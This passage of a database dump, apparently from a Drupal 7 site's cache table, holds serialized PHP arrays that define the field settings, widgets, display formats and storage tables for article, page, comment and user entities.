null\";b:0;}}s:7:\"bundles\";a:1:{s:7:\"comment\";a:2:{i:0;s:17:\"comment_node_page\";i:1;s:20:\"comment_node_article\";}}}}}',0,1423659015,1),('field_info:bundle:node:article','a:2:{s:9:\"instances\";a:3:{s:4:\"body\";a:13:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"4\";s:8:\"field_id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}s:10:\"field_tags\";a:13:{s:5:\"label\";s:4:\"Tags\";s:11:\"description\";s:63:\"Enter a comma-separated list of words to describe your content.\";s:6:\"widget\";a:4:{s:4:\"type\";s:21:\"taxonomy_autocomplete\";s:6:\"weight\";i:-4;s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:6:\"module\";s:8:\"taxonomy\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:6:\"teaser\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}}s:8:\"settings\";a:1:{s:18:\"user_register_form\";b:0;}s:8:\"required\";b:0;s:2:\"id\";s:1:\"5\";s:8:\"field_id\";s:1:\"3\";s:10:\"field_name\";s:10:\"field_tags\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}s:11:\"field_image\";a:12:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:40:\"Upload an image to go with this article.\";s:8:\"required\";b:0;s:8:\"settings\";a:9:{s:14:\"file_directory\";s:11:\"field/image\";s:15:\"file_extensions\";s:16:\"png gif jpg jpeg\";s:12:\"max_filesize\";s:0:\"\";s:14:\"max_resolution\";s:0:\"\";s:14:\"min_resolution\";s:0:\"\";s:9:\"alt_field\";b:1;s:11:\"title_field\";s:0:\"\";s:13:\"default_image\";i:0;s:18:\"user_register_form\";b:0;}s:6:\"widget\";a:4:{s:4:\"type\";s:11:\"image_image\";s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:5:\"large\";s:10:\"image_link\";s:0:\"\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:5:\"image\";s:8:\"settings\";a:2:{s:11:\"image_style\";s:6:\"medium\";s:10:\"image_link\";s:7:\"content\";}s:6:\"weight\";i:-1;s:6:\"module\";s:5:\"image\";}}s:2:\"id\";s:1:\"6\";s:8:\"field_id\";s:1:\"4\";s:10:\"field_name\";s:11:\"field_image\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";}}s:6:\"fields\";a:3:{i:0;a:16:{s:12:\"entity_types\";a:1:{i:0;s:4:\"node\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:15:\"field_data_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:19:\"field_revision_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:4:\"type\";s:17:\"text_with_summary\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:3:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:7:\"summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:2:{i:0;s:4:\"page\";i:1;s:7:\"article\";}}}i:1;a:16:{s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:4:\"tags\";s:6:\"parent\";i:0;}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";s:1:\"0\";s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:21:\"field_data_field_tags\";a:1:{s:3:\"tid\";s:14:\"field_tags_tid\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:25:\"field_revision_field_tags\";a:1:{s:3:\"tid\";s:14:\"field_tags_tid\";}}}}}s:12:\"foreign keys\";a:1:{s:3:\"tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:7:\"indexes\";a:1:{s:3:\"tid\";a:1:{i:0;s:3:\"tid\";}}s:2:\"id\";s:1:\"3\";s:10:\"field_name\";s:10:\"field_tags\";s:4:\"type\";s:23:\"taxonomy_term_reference\";s:6:\"module\";s:8:\"taxonomy\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:2:\"-1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:1:{s:3:\"tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}}i:2;a:16:{s:7:\"indexes\";a:1:{s:3:\"fid\";a:1:{i:0;s:3:\"fid\";}}s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";b:0;}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:22:\"field_data_field_image\";a:5:{s:3:\"fid\";s:15:\"field_image_fid\";s:3:\"alt\";s:15:\"field_image_alt\";s:5:\"title\";s:17:\"field_image_title\";s:5:\"width\";s:17:\"field_image_width\";s:6:\"height\";s:18:\"field_image_height\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:26:\"field_revision_field_image\";a:5:{s:3:\"fid\";s:15:\"field_image_fid\";s:3:\"alt\";s:15:\"field_image_alt\";s:5:\"title\";s:17:\"field_image_title\";s:5:\"width\";s:17:\"field_image_width\";s:6:\"height\";s:18:\"field_image_height\";}}}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";s:1:\"0\";s:12:\"foreign keys\";a:1:{s:3:\"fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:3:\"fid\";s:3:\"fid\";}}}s:2:\"id\";s:1:\"4\";s:10:\"field_name\";s:11:\"field_image\";s:4:\"type\";s:5:\"image\";s:6:\"module\";s:5:\"image\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:5:{s:3:\"fid\";a:4:{s:11:\"description\";s:54:\"The {file_managed}.fid being referenced in this field.\";s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:3:\"alt\";a:4:{s:11:\"description\";s:56:\"Alternative image text, for the image\'s \'alt\' attribute.\";s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:5:\"title\";a:4:{s:11:\"description\";s:52:\"Image title text, for the image\'s \'title\' attribute.\";s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:5:\"width\";a:3:{s:11:\"description\";s:33:\"The width of the image in pixels.\";s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:6:\"height\";a:3:{s:11:\"description\";s:34:\"The height of the image in pixels.\";s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}}}}',0,1423658880,1),('field_info:bundle:node:page','a:2:{s:9:\"instances\";a:1:{s:4:\"body\";a:13:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"2\";s:8:\"field_id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:4:\"page\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}}s:6:\"fields\";a:1:{i:0;a:16:{s:12:\"entity_types\";a:1:{i:0;s:4:\"node\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:15:\"field_data_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:19:\"field_revision_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:4:\"type\";s:17:\"text_with_summary\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:3:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:7:\"summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:2:{i:0;s:4:\"page\";i:1;s:7:\"article\";}}}}}',0,1423658787,1),('field_info:bundle:user:user','a:2:{s:9:\"instances\";a:0:{}s:6:\"fields\";a:0:{}}',0,1423658805,1),('field_info:bundle_extra:comment:comment_node_article','a:1:{s:4:\"form\";a:2:{s:6:\"author\";a:3:{s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:16:\"Author textfield\";s:6:\"weight\";i:-2;}s:7:\"subject\";a:3:{s:5:\"label\";s:7:\"Subject\";s:11:\"description\";s:17:\"Subject textfield\";s:6:\"weight\";i:-1;}}}',0,1423659015,1),('field_info:bundle_extra:node:article','a:1:{s:4:\"form\";a:1:{s:5:\"title\";a:3:{s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:19:\"Node module element\";s:6:\"weight\";i:-5;}}}',0,1423658892,1),('field_info:bundle_extra:node:page','a:1:{s:4:\"form\";a:1:{s:5:\"title\";a:3:{s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:19:\"Node module element\";s:6:\"weight\";i:-5;}}}',0,1423658787,1),('field_info:bundle_extra:user:user','a:2:{s:4:\"form\";a:2:{s:7:\"account\";a:3:{s:5:\"label\";s:22:\"User name and password\";s:11:\"description\";s:34:\"User module account form elements.\";s:6:\"weight\";i:-10;}s:8:\"timezone\";a:3:{s:5:\"label\";s:8:\"Timezone\";s:11:\"description\";s:34:\"User module timezone form element.\";s:6:\"weight\";i:6;}}s:7:\"display\";a:1:{s:7:\"summary\";a:3:{s:5:\"label\";s:7:\"History\";s:11:\"description\";s:33:\"User module history view element.\";s:7:\"display\";a:2:{s:7:\"default\";a:2:{s:6:\"weight\";i:5;s:7:\"visible\";b:1;}s:4:\"full\";a:2:{s:6:\"weight\";i:5;s:7:\"visible\";b:1;}}}}}',0,1423658805,1),('field_info:fields','a:4:{i:1;a:16:{s:12:\"entity_types\";a:1:{i:0;s:7:\"comment\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:23:\"field_data_comment_body\";a:2:{s:5:\"value\";s:18:\"comment_body_value\";s:6:\"format\";s:19:\"comment_body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:27:\"field_revision_comment_body\";a:2:{s:5:\"value\";s:18:\"comment_body_value\";s:6:\"format\";s:19:\"comment_body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:4:\"type\";s:9:\"text_long\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:2:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:7:\"comment\";a:2:{i:0;s:17:\"comment_node_page\";i:1;s:20:\"comment_node_article\";}}}i:2;a:16:{s:12:\"entity_types\";a:1:{i:0;s:4:\"node\";}s:12:\"translatable\";s:1:\"0\";s:8:\"settings\";a:0:{}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:15:\"field_data_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:19:\"field_revision_body\";a:3:{s:5:\"value\";s:10:\"body_value\";s:7:\"summary\";s:12:\"body_summary\";s:6:\"format\";s:11:\"body_format\";}}}}}s:12:\"foreign keys\";a:1:{s:6:\"format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:6:\"format\";s:6:\"format\";}}}s:7:\"indexes\";a:1:{s:6:\"format\";a:1:{i:0;s:6:\"format\";}}s:2:\"id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:4:\"type\";s:17:\"text_with_summary\";s:6:\"module\";s:4:\"text\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:3:{s:5:\"value\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:7:\"summary\";a:3:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:3:\"big\";s:8:\"not null\";b:0;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:2:{i:0;s:4:\"page\";i:1;s:7:\"article\";}}}i:3;a:16:{s:8:\"settings\";a:1:{s:14:\"allowed_values\";a:1:{i:0;a:2:{s:10:\"vocabulary\";s:4:\"tags\";s:6:\"parent\";i:0;}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";s:1:\"0\";s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:21:\"field_data_field_tags\";a:1:{s:3:\"tid\";s:14:\"field_tags_tid\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:25:\"field_revision_field_tags\";a:1:{s:3:\"tid\";s:14:\"field_tags_tid\";}}}}}s:12:\"foreign keys\";a:1:{s:3:\"tid\";a:2:{s:5:\"table\";s:18:\"taxonomy_term_data\";s:7:\"columns\";a:1:{s:3:\"tid\";s:3:\"tid\";}}}s:7:\"indexes\";a:1:{s:3:\"tid\";a:1:{i:0;s:3:\"tid\";}}s:2:\"id\";s:1:\"3\";s:10:\"field_name\";s:10:\"field_tags\";s:4:\"type\";s:23:\"taxonomy_term_reference\";s:6:\"module\";s:8:\"taxonomy\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:2:\"-1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:1:{s:3:\"tid\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:0;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}}i:4;a:16:{s:7:\"indexes\";a:1:{s:3:\"fid\";a:1:{i:0;s:3:\"fid\";}}s:8:\"settings\";a:2:{s:10:\"uri_scheme\";s:6:\"public\";s:13:\"default_image\";b:0;}s:7:\"storage\";a:5:{s:4:\"type\";s:17:\"field_sql_storage\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";s:6:\"active\";s:1:\"1\";s:7:\"details\";a:1:{s:3:\"sql\";a:2:{s:18:\"FIELD_LOAD_CURRENT\";a:1:{s:22:\"field_data_field_image\";a:5:{s:3:\"fid\";s:15:\"field_image_fid\";s:3:\"alt\";s:15:\"field_image_alt\";s:5:\"title\";s:17:\"field_image_title\";s:5:\"width\";s:17:\"field_image_width\";s:6:\"height\";s:18:\"field_image_height\";}}s:19:\"FIELD_LOAD_REVISION\";a:1:{s:26:\"field_revision_field_image\";a:5:{s:3:\"fid\";s:15:\"field_image_fid\";s:3:\"alt\";s:15:\"field_image_alt\";s:5:\"title\";s:17:\"field_image_title\";s:5:\"width\";s:17:\"field_image_width\";s:6:\"height\";s:18:\"field_image_height\";}}}}}s:12:\"entity_types\";a:0:{}s:12:\"translatable\";s:1:\"0\";s:12:\"foreign keys\";a:1:{s:3:\"fid\";a:2:{s:5:\"table\";s:12:\"file_managed\";s:7:\"columns\";a:1:{s:3:\"fid\";s:3:\"fid\";}}}s:2:\"id\";s:1:\"4\";s:10:\"field_name\";s:11:\"field_image\";s:4:\"type\";s:5:\"image\";s:6:\"module\";s:5:\"image\";s:6:\"active\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:11:\"cardinality\";s:1:\"1\";s:7:\"deleted\";s:1:\"0\";s:7:\"columns\";a:5:{s:3:\"fid\";a:4:{s:11:\"description\";s:54:\"The {file_managed}.fid being referenced in this field.\";s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:0;s:8:\"unsigned\";b:1;}s:3:\"alt\";a:4:{s:11:\"description\";s:56:\"Alternative image text, for the image\'s \'alt\' attribute.\";s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:512;s:8:\"not null\";b:0;}s:5:\"title\";a:4:{s:11:\"description\";s:52:\"Image title text, for the image\'s \'title\' attribute.\";s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:1024;s:8:\"not null\";b:0;}s:5:\"width\";a:3:{s:11:\"description\";s:33:\"The width of the image in pixels.\";s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}s:6:\"height\";a:3:{s:11:\"description\";s:34:\"The height of the image in pixels.\";s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;}}s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}}}',0,1423659086,1),('field_info:field_map','a:4:{s:12:\"comment_body\";a:2:{s:7:\"bundles\";a:1:{s:7:\"comment\";a:2:{i:0;s:17:\"comment_node_page\";i:1;s:20:\"comment_node_article\";}}s:4:\"type\";s:9:\"text_long\";}s:4:\"body\";a:2:{s:7:\"bundles\";a:1:{s:4:\"node\";a:2:{i:0;s:4:\"page\";i:1;s:7:\"article\";}}s:4:\"type\";s:17:\"text_with_summary\";}s:10:\"field_tags\";a:2:{s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}s:4:\"type\";s:23:\"taxonomy_term_reference\";}s:11:\"field_image\";a:2:{s:7:\"bundles\";a:1:{s:4:\"node\";a:1:{i:0;s:7:\"article\";}}s:4:\"type\";s:5:\"image\";}}',0,1423658787,1),('field_info:instances','a:6:{s:7:\"comment\";a:2:{s:20:\"comment_node_article\";a:1:{s:12:\"comment_body\";a:13:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"3\";s:8:\"field_id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:11:\"entity_type\";s:7:\"comment\";s:6:\"bundle\";s:20:\"comment_node_article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}}s:17:\"comment_node_page\";a:1:{s:12:\"comment_body\";a:13:{s:5:\"label\";s:7:\"Comment\";s:8:\"settings\";a:2:{s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:8:\"required\";b:1;s:7:\"display\";a:1:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:6:\"weight\";i:0;s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}}s:6:\"widget\";a:4:{s:4:\"type\";s:13:\"text_textarea\";s:8:\"settings\";a:1:{s:4:\"rows\";i:5;}s:6:\"weight\";i:0;s:6:\"module\";s:4:\"text\";}s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"1\";s:8:\"field_id\";s:1:\"1\";s:10:\"field_name\";s:12:\"comment_body\";s:11:\"entity_type\";s:7:\"comment\";s:6:\"bundle\";s:17:\"comment_node_page\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}}}s:4:\"node\";a:2:{s:7:\"article\";a:3:{s:4:\"body\";a:13:{s:5:\"label\";s:4:\"Body\";s:6:\"widget\";a:4:{s:4:\"type\";s:26:\"text_textarea_with_summary\";s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"weight\";i:-4;s:6:\"module\";s:4:\"text\";}s:8:\"settings\";a:3:{s:15:\"display_summary\";b:1;s:15:\"text_processing\";i:1;s:18:\"user_register_form\";b:0;}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:12:\"text_default\";s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}s:6:\"teaser\";a:5:{s:5:\"label\";s:6:\"hidden\";s:4:\"type\";s:23:\"text_summary_or_trimmed\";s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";s:6:\"weight\";i:0;}}s:8:\"required\";b:0;s:11:\"description\";s:0:\"\";s:2:\"id\";s:1:\"4\";s:8:\"field_id\";s:1:\"2\";s:10:\"field_name\";s:4:\"body\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}s:10:\"field_tags\";a:13:{s:5:\"label\";s:4:\"Tags\";s:11:\"description\";s:63:\"Enter a comma-separated list of words to describe your content.\";s:6:\"widget\";a:4:{s:4:\"type\";s:21:\"taxonomy_autocomplete\";s:6:\"weight\";i:-4;s:8:\"settings\";a:2:{s:4:\"size\";i:60;s:17:\"autocomplete_path\";s:21:\"taxonomy/autocomplete\";}s:6:\"module\";s:8:\"taxonomy\";}s:7:\"display\";a:2:{s:7:\"default\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:6:\"teaser\";a:5:{s:4:\"type\";s:28:\"taxonomy_term_reference_link\";s:6:\"weight\";i:10;s:5:\"label\";s:5:\"above\";s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}}s:8:\"settings\";a:1:{s:18:\"user_register_form\";b:0;}s:8:\"required\";b:0;s:2:\"id\";s:1:\"5\";s:8:\"field_id\";s:1:\"3\";s:10:\"field_name\";s:10:\"field_tags\";s:11:\"entity_type\";s:4:\"node\";s:6:\"bundle\";s:7:\"article\";s:7:\"deleted\";s:1:\"0\";s:13:\"default_value\";N;}s:11:\"field_image\";a:12:{s:5:\"label\";s:5:\"Image\";s:11:\"description\";s:40:\"Upload an image to go with this article.\";s:8:\"required\";b:0;s:8:\"settings\";a:9:{s:14:\"file_directory\";s:11:\"field/image\";s:15:\"file_extensions\";s:16:\"png gif jpg 